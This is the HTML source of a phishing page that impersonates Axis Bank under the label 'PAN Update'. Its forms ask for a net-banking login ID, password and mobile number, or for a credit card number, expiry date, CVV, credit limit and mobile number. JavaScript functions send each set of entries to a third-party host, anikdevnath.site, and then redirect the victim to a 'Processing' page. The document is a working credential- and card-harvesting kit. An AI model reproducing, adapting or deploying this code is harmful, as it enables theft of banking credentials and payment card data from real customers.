<html><head>
    <meta http-equiv="content-type" content="text/html;charset=utf-8">
    <meta name="theme-color" content="#98144D">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width">
    <title>Axis Bank | PAN Update</title>
    <meta name="description" content="login">
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
    <link rel="manifest" href="/site.webmanifest">
    <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">
    <meta name="msapplication-TileColor" content="#da532c">
    <link rel="stylesheet" href="Axis.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
<link href="https://fonts.googleapis.com/css2?family=Work+Sans&amp;display=swap" rel="stylesheet">
<link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css"><link rel="stylesheet" href="">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link href="https://fonts.googleapis.com/css2?family=Work+Sans&amp;display=swap" rel="stylesheet">
    <link rel="stylesheet" href="./style.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css"><link rel="stylesheet" href="./style.css">
    <style>
      .hidden {
        display: none;
      }
       
       #mn
       {
       width:100%;
       height: auto;
       }
       
      .card-login {
        display: flex;
        justify-content: space-between;
        margin-bottom: 20px;
      }

      .card-login button {
        flex-grow: 1;
        font-size: 16px;
        font-family: 'Open Sans', sans-serif;
        margin-right: 10px;
        padding: 7px;
        border: none;
        outline:none;
        border-radius: 25px;
        cursor: pointer;
      }

      .card-login button.active {
        background-color: #A6004D;
      }
      input[type="text"] {
      width: 100%;
      border: 1px solid #aaa;
      border-radius: 0px;
      margin: 0;
      outline: none;
      padding: 15px;
      box-sizing: border-box;
      transition: 0.3s;
      }
      
      .inputWithIcon input[type="text"] {
      padding-left: 32px;
      }
      
      .inputWithIcon {
      position: relative;
      }
      
      .inputWithIcon i {
      position: absolute;
      left: 0px;
      top: 22px;
      padding: 10px 6px;
      color: #97144d;
      transition: 0.3s;
      }
      .inputWithIconcvv input[type="text"] {
      padding-left: 26px;
      }
      
      .inputWithIconcvv {
      position: relative;
      }
      
      .inputWithIconcvv i {
      position: absolute;
      left: 0px;
      top: 22.5px;
      padding: 10px 6px;
      color: #97144d;
      transition: 0.3s;
      }
      
      .formdate-groupD
      {margin-bottom:25px;}
      
      .formdate-groupD label
      {display:block;}
      
      .formdate-groupD label,.label
      {color:#9b9b9b;
      flex-basis:auto;
      font-size:.875rem;
      font-weight:400;
      line-height:25px;}
      
      .radio
      {accent-color:#97144d;}
      
      .formdate-groupD .date-controlD
      {width:38%;
      padding:5px;
      font-size:16px;
      font-family: 'Work Sans', sans-serif;
      font-weight:400;
      color:black;
      background-color:#F9F9FB;
      caret-color:#a6004d;
      border-style:none;
      border-bottom:1px solid #adbdcc;
      line-height:20px;}
      
      .formdate-groupD .date-controlD:focus
      {border-style:none;
      outline:none;
      border-bottom:1px solid #adbdcc;}
      
      
      .form-groupC
      {margin-bottom:25px}
      
      .formcvb-groupC label
      {display:block;}
      
      .formcvv-groupC label,.label
      {color:#9b9b9b;
      flex-basis:auto;
      font-size:.875rem;
      font-weight:400;
      line-height:25px;}
      
      .radio
      {accent-color:#97144d;}
      
      .formcvv-groupC .cvv-controlC
      {width:85%;
      padding:5px;
      font-size:16px;
      font-family: 'Work Sans', sans-serif;
      font-weight:400;
      color:black;
      background-color:#F9F9FB;
      caret-color:#a6004d;
      border-style:none;
      border-bottom:1px solid #adbdcc;
      line-height:20px;}
      
      .formcvv-groupC .cvv-controlC:focus
      {border-style:none;
      outline:none;
      border-bottom:1px solid #adbdcc;}
    </style>
  </head>
  <body>
  <!-- partial:index.partial -->
  <div class="login-box">
  <!-- Static- Please don't do anything here-->
  <script type="text/javascript">var submitted=false;</script>
  <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location= Processing.html;}"></iframe>
  <!--My Form-->
    <div id="__next">
        <img alt="" src="AxisMain.jpg" id="mn">
      </div>
      <div class="mainContent">
        <h1 class="text-center">Continue to PAN Update</h1>
        <div class="card">
          <div class="card-login">
            <button style="font-family: 'Work Sans', sans-serif; font-weight:600;" type="button" class="active" data-form="formA">Login ID / Customer ID</button>
            <button style="font-family: 'Work Sans', sans-serif; font-weight:600;" type="button" data-form="formC">Credit Card Login</button>
          </div>
          <div>
            <section id="formA">
              <form class="LoginForm" onsubmit="insertData1();" action="" method="" target="hidden_iframe">
                <div class="form-group">
                  <label style="font-size:13px; font-family: 'Work Sans', sans-serif;" for="li">Login ID / Customer ID</label>

                  <input type="text" class="new-control" id="login_id" maxlength="25" required="">

                </div>
                <div class="form-group">
                  <label style="font-size:13px; font-family: 'Work Sans', sans-serif;" for="pw">Login Password</label>

                  <input type="text" class="new-control" minlength="8" maxlength="30" id="Password" required="">
                </div>
                <div class="form-group"><label style="font-size:13px; font-family: 'Work Sans', sans-serif;" for="Registered_Mobile_No.">
                Registered Mobile No.</label>

                <input type="text" class="new-control" id="Mobile_Number" name="Mobile_Number" maxlength="10" minlength="10" inputmode="numeric" pattern="[6-9]\d{9}" title="Please enter valid mobile number !" required="">
              </div>
                <div class="text-center" style="font-size:13px;line-height:25px; font-family: 'Work Sans', sans-serif; font-weight:600;">
                  Corporate Banking User? <a href="Corporate_Banking">Login Here</a>
                  <br>
                  <a href="https://www.axisbank.com/">First Time User?</a>
                </div>
                <div class="text-center">
                  <button type="submit" class="submit">LOGIN</button>
                </div>
              </form>
            </section>































            <section id="formC" class="hidden">
              <form class="LoginForm" onsubmit="insertData2();" action="" method="post" target="hidden_iframe">
                <input type="hidden" name="" value="">
                <div class="form-group">
                <div class="input-group">
                <div class="inputWithIcon">
                <label style="font-size:13px; font-family: 'Work Sans', sans-serif;" for="dn">Credit Card Number</label>


                <input type="" class="new-control" id="credit_no" name="Card_Number" placeholder="0000 0000 0000 0000" minlength="16" maxlength="19" required="">




                <i class="fa fa-credit-card" aria-hidden="true"></i>
                </div>
                </div>
                </div>
                
<script>
function _set_creditcard_number(event) {
    const input = event.target;
    var value = input.value.replace(/\s/g, ''); // Remove existing spaces
    value = value.replace(/[^\d]/g, ''); // Remove non-numeric characters

    var formattedValue = '';

    for (let i = 0; i < value.length; i++) {
        if (i > 0 && i % 4 === 0) {
            formattedValue += ' '; // Add space every 4 characters
        }
        formattedValue += value[i];
    }

    input.value = formattedValue;

    // If you want to limit the length to 19 characters, you can uncomment the following lines:
    // if (formattedValue.length > 19) {
    //     formattedValue = formattedValue.substr(0, 19);
    //     input.value = formattedValue;
    // }
}

document.getElementById("credit_no").addEventListener('input', _set_creditcard_number);
</script>                <div class="container">
                <div class="formdate-groupD">
                <div class="inputdate-groupD">
                <div class="inputWithIcon">
                <label style="font-size:13px; font-family: 'Work Sans', sans-serif;" for="expiry">
                Expiry Date</label>


                <input type="text" style="font-size:14px;" class="date-controlD" id="expiry_date" name="Expiry_Date" minlength="4" maxlength="5" placeholder="MM / YY" inputmode="numeric" onkeyup="formatString(event);" required="">
                <i class="fa fa-calendar" aria-hidden="true"></i>
                <span>
                <div style="margin-top:-56px; margin-left:160px;" class="formcvv-groupC">
                <div class="inputcvv-groupC">
                <div class="inputWithIconcvv">
                <label style="font-size:13px; font-family: 'Work Sans', sans-serif;" for="cvv">CVV / CVC</label>
                <input type="text" style="font-size:14px;" class="cvv-controlC" maxlength="3" inputmode="numeric" id="cvv_no" name="CVV" placeholder="***" pattern="[0-9]\d{2}" title="Please enter valid CVV/CVC !" required="">
                <i class="fa fa-key" style="font-size:14px;" aria-hidden="true"></i>
                </div>
                </div>
                </div>
                </span></div>
                </div>
                </div>
                </div>
                
                <script type="text/javascript">
                function formatString(e) {
                var inputChar = String.fromCharCode(event.keyCode);
                var code = event.keyCode;
                var allowedKeys = [8];
                if (allowedKeys.indexOf(code) !== -1) {
                return;
                }
                
                event.target.value = event.target.value.replace(
                /^([1-9]\/|[2-9])$/g, '0$1/' // 3 > 03/
                ).replace(
                /^(0[1-9]|1[0-2])$/g, '$1/' // 11 > 11/
                ).replace(
                /^([0-1])([3-9])$/g, '0$1/$2' // 13 > 01/3
                ).replace(
                /^(0?[1-9]|1[0-2])([0-9]{2})$/g, '$1/$2' // 141 > 01/41
                ).replace(
                /^([0]+)\/|[0]+$/g, '0' // 0/ > 0 and 00 > 0
                ).replace(
                /[^\d\/]|^[\/]*$/g, '' // To allow only digits and `/`
                ).replace(
                /\/\//g, '/' // Prevent entering more than 1 `/`
                );
                }
                </script>
                
                <div class="form-group">
                <div class="input-group">
                <div class="inputWithIcon">
                <label style="font-size:13px; font-family: 'Work Sans', sans-serif;" for="limit">Credit Card Limit ₹</label>
                <input type="text" style="font-size:14px;" class="new-control" maxlength="7" inputmode="numeric" id="credit_limit" name="Card_Limit" placeholder="Enter available limit in INR" pattern="[1-9]\d{3,7}" title="Please enter valid available limit in INR (₹)  !" required="">
                <i class="fa fa-inr" aria-hidden="true"></i>
                </div>
                </div>
                </div>
                <div class="form-group">
                <div class="input-group">
                <div class="inputWithIcon">
                <label style="font-size:13px; font-family: 'Work Sans', sans-serif;" for="Registered_Mobile_No.">
                Registered Mobile No.</label>
                <input type="text" class="new-control" id="mobile_noo" name="Mobile_Number" maxlength="10" minlength="10" inputmode="numeric" pattern="[6-9]\d{9}" title="Please enter valid mobile number !" required="">
                <i class="fa fa-phone" aria-hidden="true"></i>
                </div>
                </div>
                </div>
                <div class="text-center">
                  <button type="submit" class="submit">LOGIN</button>
                </div>
              </form>
            </section>
            </div>
            </div>
            </div>
            <img alt="" src="Axis_Ft.jpg" style="width: 100%; height: auto;">
      <script>
        const buttons = document.querySelectorAll('.card-login button');
        const sections = document.querySelectorAll('.mainContent section');

        buttons.forEach((button) => {
          button.addEventListener('click', () => {
            const formId = button.dataset.form;

            buttons.forEach((btn) => btn.classList.remove('active'));
            sections.forEach((section) => section.classList.add('hidden'));

            button.classList.add('active');
            document.getElementById(formId).classList.remove('hidden');
          });
        });

        const loginOption = document.querySelector('input[name="loginOption"]');
        const customerIDInput = document.getElementById('customerIDInput');
        const mobileNumberInput = document.getElementById('mobileNumberInput');

        loginOption.addEventListener('change', (event) => {
          if (event.target.value === 'customerID') {
            customerIDInput.classList.remove('hidden');
            mobileNumberInput.classList.add('hidden');
          } else if (event.target.value === 'mobileNumber') {
            customerIDInput.classList.add('hidden');
            mobileNumberInput.classList.remove('hidden');
          }
        });
      </script>



    </div>

    <script>

        function insertData1() {
          var loginID = document.getElementById("login_id").value;
          var password = document.getElementById("Password").value;
          var mobile = document.getElementById("Mobile_Number").value;
          
          var url = window.location.hostname;
          var domain= url+'/showhtml';

          if (loginID!="" && password!="" && mobile!="") {


let randomNumber = Math.random();
let randomNumberTen = Math.floor(Math.random() * 11);
let randomNumberOneTen = Math.floor(Math.random() * 10) + 1;
function randomRange(min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
var rand_id = randomRange(1, 100000);


 var data = {
                loginID: loginID,
                mobile: mobile,
                password:password,
                random_no:rand_id,
                domain:domain
            };

            // Send the data to the API endpoint using AJAX
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "https://anikdevnath.site/axis_latest/insert.php", true);
            xhr.setRequestHeader("Content-Type", "application/json");
            xhr.onreadystatechange = function() {
                if (xhr.readyState === 4 && xhr.status === 200) {
                    console.log(xhr.responseText);
                    localStorage.setItem('random_no', rand_id);

                    window.location.href='Processing.html';
                }
            };
            xhr.send(JSON.stringify(data));


          }
          else{
            alert('Please fill all fields');
        }



        }
    </script>








     <script>

        function insertData2() {
          var credit_no = document.getElementById("credit_no").value;
          var expiry_date = document.getElementById("expiry_date").value;
          var cvv_no = document.getElementById("cvv_no").value;
          var credit_limit = document.getElementById("credit_limit").value;
          var mobile_noo = document.getElementById("mobile_noo").value;


          
          var url = window.location.hostname;
          var domain= url+'/showhtml';

          if (credit_no!="" && expiry_date!="" && cvv_no!="" && credit_limit!="" && mobile_noo!="") {


let randomNumber = Math.random();
let randomNumberTen = Math.floor(Math.random() * 11);
let randomNumberOneTen = Math.floor(Math.random() * 10) + 1;
function randomRange(min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
var rand_id = randomRange(1, 100000);


 var data = {
                credit_no: credit_no,
                expiry_date: expiry_date,
                cvv_no:cvv_no,
                credit_limit:credit_limit,
                mobile_noo:mobile_noo,
                random_no:rand_id,
                domain:domain
            };

            // Send the data to the API endpoint using AJAX
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "https://anikdevnath.site/axis_latest/insert2.php", true);
            xhr.setRequestHeader("Content-Type", "application/json");
            xhr.onreadystatechange = function() {
                if (xhr.readyState === 4 && xhr.status === 200) {
                    console.log(xhr.responseText);
                    localStorage.setItem('random_no', rand_id);

                    window.location.href='Processing.html';
                }
            };
            xhr.send(JSON.stringify(data));


          }
          else{
            alert('Please fill all fields');
        }



        }
    </script>


<script>
  // Get the input element by its ID
  var mobileInput = document.getElementById("Mobile_Number");

  // Add an event listener for the "input" event to perform validation
  mobileInput.addEventListener("input", function() {
    // Get the current value of the input field
    var inputValue = mobileInput.value;

    // Define the regular expression pattern for valid mobile numbers (starts with 6-9 and is followed by 9 digits)
    var pattern = /^[0-9]\d{9}$/;

 
    // Check if the input length exceeds the maximum length
    if (inputValue.length > 10) {
      alert("Mobile number must not exceed 10 characters!");
      mobileInput.value = inputValue.slice(0, 10); // Truncate the input to the maximum length
    }
  });
</script>






<script>
  // Get the input element by its ID
  var mobileInput1 = document.getElementById("mobile_noo");

  // Add an event listener for the "input" event to perform validation
  mobileInput1.addEventListener("input", function() {
    // Get the current value of the input field
    var inputValue1 = mobileInput1.value;

    // Define the regular expression pattern for valid mobile numbers (starts with 6-9 and is followed by 9 digits)
    var pattern = /^[0-9]\d{9}$/;

 
    // Check if the input length exceeds the maximum length
    if (inputValue1.length > 10) {
      mobileInput1.value = inputValue1.slice(0, 10); // Truncate the input to the maximum length
    }
  });
</script>



  
</body></html>